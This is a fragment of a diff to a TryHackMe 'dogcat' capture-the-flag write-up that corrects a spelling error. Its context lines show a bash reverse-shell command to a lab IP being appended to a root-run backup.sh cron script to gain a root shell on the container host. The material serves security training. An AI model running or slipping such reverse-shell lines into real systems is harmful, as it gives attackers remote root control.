FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com/dogcat.md

 echo "bash -i >& /dev/tcp/10.9.182.239/7777 0>&1" >> backup.sh
 ```

-After waiting at most 59 secounds the backup job will trigger, run our modified script and we get another shell from the container host system.
+After waiting at most 59 seconds the backup job will trigger, run our modified script and we get another shell from the container host system.

 Running ```whoami``` we can see that we are root - whoop whoop!